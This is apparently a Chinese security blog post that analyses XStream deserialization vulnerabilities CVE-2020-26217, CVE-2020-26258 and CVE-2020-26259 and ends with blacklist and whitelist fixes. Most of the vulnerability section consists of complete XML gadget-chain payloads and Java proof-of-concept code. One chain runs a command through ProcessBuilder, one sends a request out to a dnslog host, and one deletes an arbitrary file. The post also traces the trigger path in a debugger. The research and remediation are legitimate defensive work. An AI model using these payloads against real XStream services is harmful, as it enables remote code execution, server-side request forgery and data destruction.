xstream 反序列化漏洞研究与修复

最新推荐文章于 2023-03-22 14:56:58 发布
最新推荐文章于 2023-03-22 14:56:58 发布
阅读量4.5k 收藏 10
点赞数 5
分类专栏: 安全 文章标签: xstream 反序列化漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34101364/article/details/114858734
版权

文章目录

1、简介

xstream是一个用于序列化和反序列化的java库,主要是java对象和xml之间相互转换。
XStream反序列化同fastjson这种不一样的地方是fastjson会在反序列化的时候主动去调用getters和setters,而XStream的反序列化过程中赋值都有Java的反射机制来完成,所以并没有这样主动调用的特性。

特点

  • 使用方便 - XStream的API提供了一个高层次外观,以简化常用的用例
  • 无需创建映射 - XStream的API提供了默认的映射大部分对象序列化
  • 性能 - XStream快速和低内存占用,适合于大对象图或系统
  • 干净的XML - XStream创建一个干净和紧凑XML结果,这很容易阅读
  • 不需要修改对象 - XStream可序列化的内部字段,如私有和最终字段,支持非公有制和内部类,默认构造函数不是强制性的要求
  • 完整对象图支持 - XStream允许保持在对象模型中遇到的重复引用,并支持循环引用
  • 可自定义的转换策略 - 定制策略可以允许特定类型的定制被表示为XML的注册
  • 安全框架 - XStream提供了一个公平控制有关解组的类型,以防止操纵输入安全问题
  • 错误消息 - 出现异常是由于格式不正确的XML时,XStream抛出一个统一的例外,提供了详细的诊断,以解决这个问题
  • 另一种输出格式 - XStream支持其它的输出格式,如JSON

2、举例

引入xstream

 <dependency>
      <groupId>com.thoughtworks.xstream</groupId>
      <artifactId>xstream</artifactId>
      <version>1.4.16</version>
 </dependency>

随便创建一个Student类,用于反序列化和被反序列化:

package xstream;

public class Student {
    public String name;
    public String sex;
    //@JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)
    public Object myObject;

    public Student(){
        System.out.println("Student 构造函数");
    }
    public String getName(){
        System.out.println("getName");
        return name;
    }
    public void setName(String name){
        System.out.println("setName");
        this.name = name;
    }
    public String getSex(){
        System.out.println("getSex");
        return sex;
    }
    public void setSex(String sex){
        System.out.println("setSex");
        this.sex = sex;
    }

    public Object getMyObject() {
        System.out.println("getMyObject");
        return myObject;
    }
    public void setMyObject(Object myObject) {
        System.out.println("setMyObject");
        this.myObject = myObject;
    }
    @Override
    public String toString() {
        return String.format("Student.name=%s, Student.sex=%s", name, sex);
    }
}

具体实现栗子

package xstream;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.StaxDriver;

import java.io.IOException;

public class XstreamPoc {
    public static void main(String[] args) throws IOException {
        poc01();
    }
    public static void poc01() throws IOException {
        Student student = new Student();
        student.setName("5wimming");
        student.setSex("boy");

        XStream xstream = new XStream(new StaxDriver());

        String xml = xstream.toXML(student);
        System.out.println(xml);

        Student student02 = (Student) xstream.fromXML(xml);
        System.out.println(student02);
    }

}

运行结果如下

Student 构造函数
setName
setSex
<?xml version="1.0" ?><xstream.Student><name>5wimming</name><sex>boy</sex></xstream.Student>
Student.name=5wimming, Student.sex=boy

3、漏洞

CVE-2020-26217

首先引入满足漏洞条件的xstream包,小于1.4.13即可

 <dependency>
     <groupId>com.thoughtworks.xstream</groupId>
     <artifactId>xstream</artifactId>
     <version>1.4.11</version>
 </dependency>

官方给的poc

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
        <dataHandler>
          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
            <contentType>text/plain</contentType>
            <is class='java.io.SequenceInputStream'>
              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
                <iterator class='javax.imageio.spi.FilterIterator'>
                  <iter class='java.util.ArrayList$Itr'>
                    <cursor>0</cursor>
                    <lastRet>-1</lastRet>
                    <expectedModCount>1</expectedModCount>
                    <outer-class>
                      <java.lang.ProcessBuilder>
                        <command>
                          <string>calc</string>
                        </command>
                      </java.lang.ProcessBuilder>
                    </outer-class>
                  </iter>
                  <filter class='javax.imageio.ImageIO$ContainsFilter'>
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>start</name>
                  </filter>
                  <next/>
                </iterator>
                <type>KEYS</type>
              </e>
              <in class='java.io.ByteArrayInputStream'>
                <buf></buf>
                <pos>0</pos>
                <mark>0</mark>
                <count>0</count>
              </in>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <string>test</string>
  </entry>
</map>

建一个poc:

package xstream;

import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.StaxDriver;

import java.io.IOException;

public class XstreamPoc {
    public static void main(String[] args) throws IOException {
        poc02();
    }
    public static void poc02(){
        String pocXml = "<map>\n" +
                "  <entry>\n" +
                "    <jdk.nashorn.internal.objects.NativeString>\n" +
                "      <flags>0</flags>\n" +
                "      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n" +
                "        <dataHandler>\n" +
                "          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n" +
                "            <contentType>text/plain</contentType>\n" +
                "            <is class='java.io.SequenceInputStream'>\n" +
                "              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\n" +
                "                <iterator class='javax.imageio.spi.FilterIterator'>\n" +
                "                  <iter class='java.util.ArrayList$Itr'>\n" +
                "                    <cursor>0</cursor>\n" +
                "                    <lastRet>-1</lastRet>\n" +
                "                    <expectedModCount>1</expectedModCount>\n" +
                "                    <outer-class>\n" +
                "                      <java.lang.ProcessBuilder>\n" +
                "                        <command>\n" +
                "                          <string>calc</string>\n" +
                "                        </command>\n" +
                "                      </java.lang.ProcessBuilder>\n" +
                "                    </outer-class>\n" +
                "                  </iter>\n" +
                "                  <filter class='javax.imageio.ImageIO$ContainsFilter'>\n" +
                "                    <method>\n" +
                "                      <class>java.lang.ProcessBuilder</class>\n" +
                "                      <name>start</name>\n" +
                "                      <parameter-types/>\n" +
                "                    </method>\n" +
                "                    <name>start</name>\n" +
                "                  </filter>\n" +
                "                  <next/>\n" +
                "                </iterator>\n" +
                "                <type>KEYS</type>\n" +
                "              </e>\n" +
                "              <in class='java.io.ByteArrayInputStream'>\n" +
                "                <buf></buf>\n" +
                "                <pos>0</pos>\n" +
                "                <mark>0</mark>\n" +
                "                <count>0</count>\n" +
                "              </in>\n" +
                "            </is>\n" +
                "            <consumed>false</consumed>\n" +
                "          </dataSource>\n" +
                "          <transferFlavors/>\n" +
                "        </dataHandler>\n" +
                "        <dataLen>0</dataLen>\n" +
                "      </value>\n" +
                "    </jdk.nashorn.internal.objects.NativeString>\n" +
                "    <string>test</string>\n" +
                "  </entry>\n" +
                "</map>";
        XStream xstream = new XStream(new StaxDriver());
        xstream.fromXML(pocXml);
    }
}

运行后弹出计算器
在这里插入图片描述

CVE-2020-26258

这是一个SSRF漏洞,xstream版本小于1.4.14

漏洞payload:

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
        <dataHandler>
          <dataSource class='javax.activation.URLDataSource'>
            <url>http://localhost:8080/internal/:</url>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <string>test</string>
  </entry>
</map>

poc如下:

    public static void poc03(){
        // CVE-2020-26258
        String pocXml = "<map>\n" +
                "  <entry>\n" +
                "    <jdk.nashorn.internal.objects.NativeString>\n" +
                "      <flags>0</flags>\n" +
                "      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n" +
                "        <dataHandler>\n" +
                "          <dataSource class='javax.activation.URLDataSource'>\n" +
                "            <url>http://xstream26258.dnslog.com/:</url>\n" +
                "          </dataSource>\n" +
                "          <transferFlavors/>\n" +
                "        </dataHandler>\n" +
                "        <dataLen>0</dataLen>\n" +
                "      </value>\n" +
                "    </jdk.nashorn.internal.objects.NativeString>\n" +
                "    <string>test</string>\n" +
                "  </entry>\n" +
                "</map>";
        XStream xstream = new XStream(new StaxDriver());
        xstream.fromXML(pocXml);
    }

运行,发现dnslog成功了
在这里插入图片描述

CVE-2020-26259

这是一个任意文件删除漏洞,xstream版本需要小于1.4.14

首先在某个目录下创建一个test.txt,payload如下:

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
        <dataHandler>
          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
            <contentType>text/plain</contentType>
            <is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'>
              <tempFile>/Users/5wimming/temp/test.txt</tempFile>
            </is>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <string>test</string>
  </entry>
</map>

poc如下:

   public static void  poc04(){
       String pocXml = "<map>\n" +
               "  <entry>\n" +
               "    <jdk.nashorn.internal.objects.NativeString>\n" +
               "      <flags>0</flags>\n" +
               "      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n" +
               "        <dataHandler>\n" +
               "          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n" +
               "            <contentType>text/plain</contentType>\n" +
               "            <is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'>\n" +
               "              <tempFile>/Users/5wimming/temp/test.txt</tempFile>\n" +
               "            </is>\n" +
               "          </dataSource>\n" +
               "          <transferFlavors/>\n" +
               "        </dataHandler>\n" +
               "        <dataLen>0</dataLen>\n" +
               "      </value>\n" +
               "    </jdk.nashorn.internal.objects.NativeString>\n" +
               "    <string>test</string>\n" +
               "  </entry>\n" +
               "</map>";
       XStream xstream = new XStream(new StaxDriver());
       xstream.fromXML(pocXml);
   }

执行,然后文件说没就没了。

调试

我们调试一下后面几个漏洞吧
首先进入com.thoughtworks.xstream.XStream#fromXML(java.io.Reader)函数
在这里插入图片描述
接着进入com.thoughtworks.xstream.XStream#unmarshal(com.thoughtworks.xstream.io.HierarchicalStreamReader, java.lang.Object, com.thoughtworks.xstream.converters.DataHolder)函数
在这里插入图片描述
中间一大坨枯燥无味就不跟了,直奔主题。
跟进到com.thoughtworks.xstream.converters.collections.MapConverter#putCurrentEntryIntoMap函数,在 Xstream 构建 entry 的过程中,将本次的key 值NativeString, put 到 map中:
在这里插入图片描述
强制进入put函数中,发现key值会被传进hash函数,继续跟进
在这里插入图片描述
发现key值就调用hashCode()函数,这就是问题所在,如果恶意类在hashCode中有恶意操作,就可以利用起来了,刚好NativeString就是这个类
在这里插入图片描述
我们进入jdk.nashorn.internal.objects.NativeString#hashCode函数,发现它调用了getStringValue函数,而getStringValue函数里面的value又调用了toString函数,这里的value就是Base64Data类
在这里插入图片描述
跟进toString函数,发现调用了get函数,继续跟进get函数
在这里插入图片描述
发现CVE-2020-26258和CVE-2020-26259这的触发点,CVE-2020-26217 利用的是readFrom 及其后续,不过因为 Xstream 黑名单限制了进行远程代码执行。而CVE-2020-26258和CVE-2020-26259利用 getInputStream 函数与 close 函数分别进行 ssrf 和文件删除。
在这里插入图片描述
下面是getInputStream 函数导致SSRF漏洞的触发点
在这里插入图片描述
下面是close函数导致文件删除的触发点
在这里插入图片描述

4、修复

黑名单方式

XStream xstream = new XStream();
// 首先清除默认设置,然后进行自定义设置
xstream.addPermission(NoTypePermission.NONE);
//将ImageIO类加入黑名单
xstream.denyPermission(new ExplicitTypePermission(new Class[]{ImageIO.class}));
xstream.fromXML(xml);

白名单方式

XStream xstream = new XStream();
// 首先清除默认设置,然后进行自定义设置
xstream.addPermission(NoTypePermission.NONE);
// 添加一些基础的类型,如Array、NULL、primitive
xstream.addPermission(ArrayTypePermission.ARRAYS);
xstream.addPermission(NullPermission.NULL);
xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
// 添加自定义的类列表
stream.addPermission(new ExplicitTypePermission(new Class[]{Date.class}));

参考:
https://www.jianshu.com/p/d8e6c5488353
https://www.cnblogs.com/v1ntlyn/p/14034019.html
https://blog.csdn.net/further_eye/article/details/110421329

5wimming
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
XStream1.4.16反序列化漏洞(CVE-2020-26258、CVE-2020-26259)
05-08
XStream是一个常用的Java对象和XML相互转换的工具。近日XStream官方发布安全更新,修复XStream 反序列化漏洞(CVE-2020-26258、CVE-2020-26259)。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-2020-26259 任意文件删除漏洞
XStream反序列化漏洞(cve-2020-26258/cve-2020-26259)
chaojixiaojingang
12-17 3373
1.漏洞描述 XStream是一个常用的Java对象和XML相互转换的工具。在运行XSteam的服务上,未授权的远程攻击者通过构造特定的序列化数据 ,可造成任意文件删除/服务端请求伪造(SSRF) 。 2.影响版本 XStream <= 1.4.14 3.漏洞POC 1)cve-2020-26259:任意文件删除 import com.thoughtworks.xstream.XStream; /* CVE-2020-26259: XStream is vulnerab...
redis总结
CRAJA的blog
01-04 1992
Redis redis视频链接 概述 Redis是什么 Redis是一个使用ANSI C编写的开源、支持网络、基于内存、分布式、可选持久性的键值对存储数据库。 Redis能做什么 内存存储,持久化(rdb,aof) 效率高,可以用于高速缓存 订阅系统 地图信息分析 计时器,浏览量 . 安装 1. 下载压缩包 wget 软件链接 2. 解压gz压缩包 tar -zxvf redis-6.2.6.tar.gz 3. 安装gcc-c++环境 yum install gcc-
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
xstream序列化与反序列化
06-07
xstream中xml与javaBean的互转
java xstream组件反序列化漏洞复现
Shanfenglan's blog
12-16 2387
文章目录前言1. CVE-2021-213511.1 利用2. CVE-2021-295052.1 利用 前言 XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用javax.naming.ldap.Rdn_-RdnEntry及javax.sql.rowset.BaseRowSet构造JNDI注入,进而执行任意命令。
Xstream漏洞复现(CVE-2021-29505)
Ashely的博客
09-24 2778
Vulhub漏洞环境搭建 拉取漏洞镜像 复现漏洞 一、Vulhub漏洞环境搭建 详见文章Vulhub靶场搭建(Centos7) 二、拉取漏洞镜像 1.进入到vulhub/Xstream/CVE-2021-29505目录下,执行 docker-compose up -d 等待拉取镜像。(默认拉取镜像速度很慢,建议换源,可参考https://blog.csdn.net/weixin_30565327/article/details/101108079) 2. ...
XStream 反序列化漏洞 (CVE-2020-26258 & 26259) 的复现与分析
smellycat000的专栏
12-16 3622
聚焦源代码安全,网罗国内外最新资讯!Xstream 是 Java 类库,用来将对象序列化成 XML (JSON) 或反序列化为对象。XStream 是一款开源软件,允许在 BSD 许可...
SpringBoot-Eureka-xstream-rce漏洞复现
tpaer的博客
11-25 7621
关于SpringBoot-Eureka-xstream-rce漏洞复现的一次实战。
『Java安全XStream 1.4.13反序列化漏洞CVE-2020-26217复现与浅析
Ho1aAs‘s Blog
08-15 1325
漏洞是对CVE-2013-7285的绕过新增一个内置黑名单converter过滤EventHandler等}新增安全框架开发者可选择自定义黑白名单、以及使用默认安全策略开发者自定义黑白名单默认安全策略。
腾讯蓝军安全通告:XStream修复14个安全漏洞.pdf
09-18
腾讯蓝军安全通告:XStream修复14个安全漏洞 安全分析 安全意识教育 安全实践 信息安全 攻防实训与靶场
xstream-1.4.15.jar
01-28
XStream 反序列化漏洞(CVE-2020-26258 & 26259),修复jar包 xstream-1.4.15.jar Xstream 是 Java 类库,用来将对象序列化成 XML (JSON) 或反序列化为对象。XStream 是一款开源软件,允许在 BSD 许可证的许可下分发。 0x01 漏洞描述 Xstream上次对CVE-2020-26217处理并不彻底,虽然通过黑名单方法阻止了远程代码执行,但是仍然可以采用类似思路实现文件删除与服务器请求伪造。 影响版本 Xstream = 1.4.15 风险等级 严重
核心开发接口五,update方法
weixin_40512519的博客
07-09 1120
1.更新Detached对象,又把它变成Persistent,同时数据库里更新。2.更新Transient对象会报错。因为update语句需要Update **** where id=?,Transient没有id。如果手动设置id不报错,前提是数据库里要有对应的id。3.部分更新。哪个字段改过就更新哪个字段,没改就不更新。Persistent状态的对象只要设定不同字段就会发生更新。更新就会出现数...
漏洞复现-Xstream(CVE-2021-29505)
aming小老弟
06-01 1520
Xstream
Dubbo——序列化(Serialize)协议原理
庄小焱
04-02 2607
摘要 Dubbo 就依靠 SPI 机制实现了插件化功能,几乎将所有的功能组件做成基于 SPI 实现,并且默认提供了很多可以直接使用的扩展点,实现了面向功能进行拆分的对扩展开放的架构。 什么是 SPI SPI (Service Provider Interface),主要是用来在框架中使用的,最常见和莫过于我们在访问数据库时候用到的java.sql.Driver接口了。你想一下首先市面上的数据库五花八门,不同的数据库底层协议的大不相同,所以首先需要定制一个接口,来约束一下这些数据库,使得 Java 语言
XStream反序列化
Finlinlts的博客
10-01 1665
概述 XStream是Java类库,用来将对象序列化成XML(JSON)或反序列化为对象。XStream在运行时使用Java反射机制对要进行序列化的对象树的结构进行探索,并不需要对对象作出修改。XStream可以序列化内部字段,包括私private和final字段,并且支持非公开类以及内部类。在缺省情况下,XStream不需要配置映射关系,对象和字段将映射为同名XML元素。但是当对象和字段名与XML中的元素名不同时,XStream支持指定别名。XStream支持以方法调用的方式,或是Java标注的方式指定
Xstream使用过程出现: .java.lang.ClassCastException
dumuzhouguohe的博客
03-22 320
Xstream 报文类转换报错
『Java安全XStream基础使用与序列化和反序列化源码浅析
Ho1aAs‘s Blog
08-10 960
XStream is a simple library to serialize objects to XML and back again. 简介 依赖 基础使用demo JavaBean对象 代码 序列化结果 反序列化结果 同一对象序列化和反序列化的一致性 进阶操作 给标签起别名 将对象属性转化为XML标签属性 添加隐式集合 设置变量不被序列化 XStream核心结构图 浅析XStream序列化操作的源码 参考 完.......................................
spf、dkim、dmarc介绍与邮件伪造研究
热门推荐
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
08-18 1万+
文章目录spf、dkim、dmarc介绍SPFDKIMDMARC测试工具Swaks spf、dkim、dmarc介绍 SPF SPF(Sender Policy Framework)发件人策略框架 SPF 是为了防范伪造发件人地址发送垃圾邮件而提出的一种开放式标准,是一种以 IP 地址认证电子邮件发件人身份的技术。域名所有者通过在 DNS 中发布 SPF 记录来授权合法使用该域名发送邮件的 IP 地址。 当在 DNS 中定义了域名的 SPF 记录后,为了确认邮件声称发件人不是伪造的,邮件接收方首先检查邮件域
常见的Java反序列化漏洞
最新发布
05-20
4. XStream反序列化漏洞:攻击者可以通过构造恶意的XML数据,导致反序列化时执行任意代码。 5. Fastjson反序列化漏洞:攻击者可以通过构造恶意的JSON数据,导致反序列化时执行任意代码。 为避免反序列化漏洞的发生...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值